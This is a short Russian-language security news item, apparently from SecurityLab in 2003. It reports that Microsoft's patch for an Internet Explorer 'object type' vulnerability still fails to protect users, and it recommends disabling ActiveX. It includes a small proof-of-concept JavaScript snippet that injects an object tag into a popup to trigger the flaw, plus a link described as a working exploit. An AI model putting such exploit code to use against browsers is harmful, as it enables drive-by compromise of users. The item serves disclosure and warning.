Заплатка для Internet Explorer все еще не работает (эксплоит)

Выпущенный еще 20 августа патч, который должен был закрыть вопрос уязвимости MS IE при обработке запросов вида “object type”, по-прежнему отказывается защищать компьютеры.

Выпущенный еще 20 августа патч, который должен был закрыть вопрос уязвимости MS IE при обработке запросов вида “object type”, по-прежнему отказывается защищать компьютеры.

Даже несмотря на то, что 28 августа 2003 года Microsoft выложила на своем сервере обновленный вариант заплатки, установившие ее пользователи по-прежнему остаются под угрозой.

До тех пор, пока программисты Microsoft не справятся со своей задачей, пользователям рекомендовано отключить на своих браузерах поддержку технологии ActiveX или поменять браузер.

Пример:

 <script>
   var oPopup = window.createPopup();
 
   function showPopup() {
     oPopup.document.body.innerHTML = "<object data=ouch.php>";
     oPopup.show(0,0,1,1,document.body);
   }
   
   showPopup()
 </script>
 
Пример рабочего эксплоита: http://www.malware.com/badnews.html
Telegram Подписывайтесь на канал "SecurityLab" в Telegram, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

comments powered by Disqus